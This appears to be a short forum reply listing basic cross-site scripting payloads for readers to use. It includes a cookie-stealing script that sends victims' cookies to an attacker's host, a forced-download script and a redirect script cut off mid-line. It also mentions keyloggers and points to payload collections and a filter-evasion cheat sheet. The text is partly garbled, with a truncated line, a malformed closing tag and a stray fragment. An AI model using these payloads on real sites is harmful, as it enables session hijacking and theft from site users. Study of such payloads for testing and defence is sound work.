-
Ex.
----
-Basic xss attacks:
ex.
*Cookie Stealing XSS: <script>document.write('<img
src="http://<Your IP>/Stealer.php?cookie=' %2B document.cookie
%2B '" >');<script>
*Forcing the Download of a File: <script>var link =
document.createElement('a'); link.href =
'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
link.download = ''; document.body.appendChild(link); link.click();
</script>
*Redirecting User: <script>window.location =
"
*Other Scripts to Enable Key Loggers, Take Pictures, and More
c#category=capture
----
-2 good resources to help you get started:
*https://github.com/foospidy/payloads/tree/master/other/xss
*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
----
[/REPLY]